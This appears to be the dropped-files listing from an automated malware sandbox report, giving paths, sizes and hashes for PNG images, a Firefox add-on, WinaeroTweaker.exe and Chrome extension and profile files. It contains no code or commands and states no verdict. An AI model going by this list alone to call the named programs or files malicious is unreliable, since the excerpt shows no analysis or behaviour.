                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      63285eb8945196584581db9d3df20a8c

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      1754109e7dddac627dccf06b2f0aae17f4e9264e

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      4f00aa3892757cadd2193b4497b1f9056a0282bf3a535fe5573c12ab760abb05

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      55ebadbcb5146c46ddc77cf468a8ecc9bf1ac595d845306beac90be3b2811eefea342d9d1aa46f100d46206acff50a6b2a2a6eccc5a984371735e90c6b744e69

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.006.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      f144faa4e87b3bd201df41c7ae376a1a

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      8cb59f1e907698f1afe06b4219f9e96274ea8388

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      71bc0711ba3bb313698b0e3c2660039e58fba48bdb4984ebd8aad4b446fd2ae5

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      1e7b9e19082aa5f698a2b68ee69ce54901b4ec0bc7639d52d12d848b1fe05326306092f876a8210ae433cb69decc8fdd8e0276a11ed50de7bdcb24f4ed21c542

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.007.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      043523bc6b3b9b06983b1c1741ac5356

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      6df40cd835fa393d7d80ea1d5667428f6b712b20

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      bc55d158da799959613ef4e20f9215ca38c770a4b1eb53b2d72245d20701f612

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      db86312a477a25e61739511659d313db325e7fcaadbe155db16cba5e4e753094a33457f1ac254d41087e5e6950950665ab0f4560fbcbf216a1a759956504d021

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.008.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      9aaa08fb1290bb8eff17a0f65330d388

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      e7136dd9ee818b4f2912351cd36a861611b3e1df

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      57dfd6ff7b30c5a41f996153ae7e57d462643f695dbc9888b2b9eccefb6f80ad

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      7ff6646376341aa7a071e3064ccac4a5fd14fc70f4d82af604254cb6a4262033050557316e0533d19735f7f99723ab86f96eee54bf59a083516e16ffee940ab0

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.009.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      35305f3a27dce2bd66ae4c57ec0ccfb0

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      5919eef1b72725255dd08be330d753ac900d0c63

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      c9b7acff73ec232a1ace74587004a4f5bfd180238306ee2536ef4e539975f01e

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      1521603d6057bd655484a296ae39ca3c158f52ae882da76115433912bf1fdeed9f67053aafcbd85a8120cd15c1c43cffbafa7a045c1a39fc5cb258f0866a265d

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.010.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      2404c49fa3dd28d5f08667c828f488a7

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      7a273927c13313d46491a5cb72780804bb0896d1

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      3c5ca5c81a39066ff15d0d6f117880b6b5160576a7fee1dac520caf510f15ca6

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      d9853f0383e96a4d019066e2f60dc342f239bead8ea0e67d26094b15d2509b753c85427695ddf36c872ac901cfbb961a9a2f5d545f4c24717b68216c9982a75d

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.011.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      05d088474ec77d9162bb57594f260e8f

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      30f7c3a3576856b5a152fde1dbd8b904fb15b45a

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      9828e2624abad46f7d1d7b8b62745f121d5c586ab0949630cf65d7006e925c71

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      697fea98297e74636ccaf0a4ac8ed66486b26a54839bafbd1ffa8d05c4aea58b007caf4a043b822f59b9e2aaae42ddfae5059faeccf9cdae6ead1d2da03dca62

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.012.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      05693244c870ba7d1993bf97caf61fef

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      4ab58d253a3f642d9d0833ae625d8ac3bd6057dd

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      4d989d4b3fb76aaf2e821f241efe5cc04f6eb17d27a220d7561075edfe9795ad

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      d29a5c8bee31e18dd8d06a6870559affa3b3cdd4c0db6bdeb062c2bd7c77b5d2c7a935fd042bb9ac815f887c3554401b9925f86e8a94feedffdecc60db9b0c2e

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.016.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      f9fc563be44e097f02dce139b0fb18aa

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      2ebb3c5e2ebafc4e60365b6a733f45e8c7e2b97e

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      54baaf1fb685c54a3e2d5a683a119e8e4bfe3819f085847a5487a2cbc8354b0b

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      01a46a0ce485f3dbc4551d121d67152b076006567f1c81fc53d34b58bac134ab16d2ef51d9ed2cdd4eae6457e0c852c4fd4ad66b68f75fa6e217d77e2177c2a7

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.017.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      1cdbca49ffd7f28d6fe31c7b1e7bc5a3

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      148ab41b415b6c83658105370c72d6a017423ba3

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      6712bb4deb1b1d090141ed4e12e349154e08470d1bd5c191f9ddb61fa8a19436

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      71021406a517785b434bbed37d425e1a9c869586ebe727a318187224d3705de220f86a4b1d3bec013795dd1ed41c9cff5e0b2b021fc175cc161661868596d6db

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.018.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      d26ca176ea5260ed668e33853e34e31e

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      623ef29ea13eb0d7ccf944b16c4cc34ba1e6af23

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      cb0f5f4f8f0f77319439b6887e9aae835cd297792b3f0d7f972334ec9bd0d481

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      e232f68c6e02e06ed4788f54397ac664d59e211d6c54df5e1b90b8fc2045721422c7e879595bf4ba55aaeb857a19d0186c97bb812cf5e767484da614e7d8fa44

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.019.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      dcc7ffb5744fdcbef275b33d06aaa6e0

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      6bb8a83f264a8ad36089deaca418f765e60bff1d

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      227b127257ffed87d08a2ea98f38a4f7708b132fdee8f8b69dafd363322679b6

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      ef5be2715a8bdf18984145f1ab1f8359848ab6873560ac61930d8629e2bdce664edf2ee580b8c41d2b7b3416e9f51d6d6c217c24f0bf72e4ce51eec167842a6d

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.020.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      92962375590ae487dea042affecf9cf1

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      f99cd61418b712ab8f25cc84dcc719a18bb9380b

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      0fdad0c93a20304c3189556527e98f8d42afdf06fe1cbbda05aea69ee0e66c61

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      37c2a8528d484d2e85f4580115a31227b82b5e155af50ef3d45e28f4f1ba875c44fa93db951e5d4631144dd138d849a4e0e4054d463b2db51e7bb90a4b39f1e3

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.021.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      4effec8f6cfabdfffc176d16d7e6097b

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      82d6f86f0c9d693012f34e4933a4fbe5e2e38603

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      f39f37e87c0e1c90c7b97d8d8f27b526aa5e47122fff2b9e56e8e9008bce4a26

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      b272eaac28677897a84d83e5fb8ad6b42a4fd25a513da560e81c56e737b429654edd96e0c3e7221578c5f8f2a41e7a1a96fc599dbbcd15ebc98e629a8c6106fb

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.022.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      9e0b18bf9be5015313a3d688562866f4

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      e0a460ff0c3f33634c3a0c6280f68b22df50fc67

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      2875fc2cb833e62c4597a2074d7d8a5f86db2d5fe47040905e2b03fa8fe042a1

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      d9750cf73e663c84d401259c203d18aad927a1066f61b1e48fd7b5dc0461c65b5306e4bea09fc5c58f2fa9eb535d69065b25f07a45517fd981da48e94c3e8a6b

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.023.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      49faeb7a716689d7ac1621eb0565db1c

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      1e593c048c6dfa3f635a2e17e0649a7237b9d78c

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      0387a81016c3877db156c54377f8e24089df99386b0a3c4c9e81009690d36251

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      190db7b341e3a352ab4564461ab974706d71ee87798db510e51e39b592e55d92472a7a4c7ed33cbf23ea75bfdfe0ecfa28110babaede402ebb576860bb7d876d

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.024.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      b2be217c3527b0ce7b410c933bf2abf6

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      57e50180dbdf44f141071f9e3e06e9399243565b

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      0ce79e842cc584224c4b3a3a9c41da81e8250e09bda167b25b490994eea53dae

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      f0835ff0c9bf894e79bb32336b49898ab92fedb736918dc40a513b7dd6175a17519e84d20d3da6039efa50e2cb6427a597d453ce858eff322f115742bf135a0a

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.025.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7ca9517b6cb5adac6a53293e91904a36

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      f15aca43c3262209a8f8cab7aa9b6419af5b4445

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      513d99c0a7d58e011452200c96fd888bc749fb7b858e85debc7c22b63afad59f

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      3f036c097d8d60166d8d29c9ecba9016765e05e136d83cd7d562d6bd140454b4d465d39baf55e0a99c34cdc3a1b4021211bc53d868796ab37fbe8bcf8612eed7

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.026.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      75437db389982266a94c8cefb0a9f1bb

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      6525f333c15f04532213f98b75e9780935a4746b

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      63ec2bdbe544e07ca3b135212f2e189f7d6fd4dc0c2ec1f91971928cbe3f3d94

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      a637885d466cb3dfa8f7ea5674a3c88ba0dbab67e1ee0b8c62843a7411095c078d2ce9ae89dea332c2e41873b1fea1b23d2b538dff909d6fed88740e47d53477

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.027.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      57ab79e9de23ebe98b3594ac03ac18ac

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      fe05199bea0ea0b3f0b45c18e5e80c5b762bf6dc

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      92ba4342f4bbe7c75d77e0d1c3b8d3de1ab3d4adc10ac3d6c8faa0bb311d89f7

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      7b2b11998b02b23db5852e04940ef55a8ea76def5a6a7a5916818d70e5ef97cf332f19095a059794459fb5ca29f5fe5c6748159a9b9b6527d6fa6125e2842cb6

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.028.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      85d7f8b031bdb23deaebb3306df0f54e

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      f0689fa048f5e6f991cfe428ff3740eb39b240bc

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      b2441c7c28aa2da5dd1d75bb21361aa391be49500087c237b43751c4a581f7da

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      cf01d6eec06da753df6ae900592e8635e577677bb46a5396612184781ced55dc5a445689402f49efaa56da74bcfedcd1eccffd44e964e96fea5f58ee7ee6277a

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.029.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      06c1ba5e99ffdd9e16b43ac3ff2aaaef

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      b5a0b4473df8201f8d4945a77b78b5d98b47ebe4

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      39530a5a56617c97023666c8a58d7ef1199392d8df88d073bf165b42811fe20d

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      19c1f5629e31a512570d11766c0e19154aca55a1ce36d69466f8f003ffee83d0c6be9b2fbb6ac9c5253ab3fc8bc5e170931528ec762cba5e89c48cac678e19bb

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.030.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      01efc356a8810931ed0c405ed17aa5cc

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      99154a8ebe89c9b5f130d52bdc84c4f7dce1b4fe

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      92868dafb9ea7dc761b174375f297bcf5bb664bfbcfbd81038f250e077ed7bc7

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      352521274785b72725dcd6c543824974743bf6ebd31e29eb66138b1f786e8ecedb96d508ec03ee5a213585c6015ae3842d80d23c63e0ba6b2a758b45f558b1a6

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.031.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      40e3897d8dd31fedea8bb63bf4b73899

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      73b5929af02d6aa86915c7dcb21f44de72c09e81

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      290c296f6044ee80b570b9755fd45c58cf65da964f79efeda5159f39585cb1b1

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      1eb42a1c044fc950a65583ae6f2721f680618439bcb1a914d0fc9acda39df5bd85f423c0f1cef479f82922cf0fd0c3a4cd37a3eae0af1c149f5569f6e03d1c70

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.032.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      80b049927202140420270634349044ea

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      b0facc4eb4da84e001f7e577c4b1ace2244edca0

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      e1b143908e032be82a3b9687588fb106917c0651575fe60f66e3d9e5a7fd19e5

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      37dabc2b3d457790ba6efaa11ba2bd9f81859e3f622386a75b4248b89a2bb4836fb4ebe25e0baf350b3b49d7c0e030d2e4f53800db37ffc4ac64ef52e30af725

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.033.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7541640e02b72ca8f507d6fcc981258a

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      b3874fdaf5a66e766402a7ad0604d95069e49ba2

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      028cd0f2adc10b5a4fc0c335763f06307af0e559c11f2ac6baa3925398842e47

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      84960e38ee667808d84682a8e6cf4e33aac2e5780366358d5d907c10d37cc98a8985f793d0e133c2ca4ccaa13ae29ed0c95530f6a01a438be8e3fd1ea9800f5c

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      0ef9cd6086c405c6956b2f5770e7f302

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      9ae8eb09b71e37dc41d6cbd004d9fa2c37afc18c

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      4fd989c32e6e78898829920e0afcc3cc488c12fc009987bf909571a724eae2ff

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      83b29cb3da47c92566739343c3fa5b28e68ca4ecc7b6fe5d6e09fa688c33b4546aa47e6f199b20e7f7506d4ac83acc8a981a2a3d02bf38822f42598b5b4cbef3

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      2.9MB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      6bb0ab3bcd076a01605f291b23ac11ba

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      c486e244a5458cb759b35c12b342a33230b19cdf

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      187B

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      136B

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      150B

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      5c3c5f1ea9d02dc9981c7525fa2a78a3

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      8d0de54ecad25975229d7639391a43b34e145720

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      c89a484cc8879c79f4790d7ffcae82bb1de563617f52cbb13075237bc379256f

                                                                                                                                                                                                                                                                                                                                      SHA512

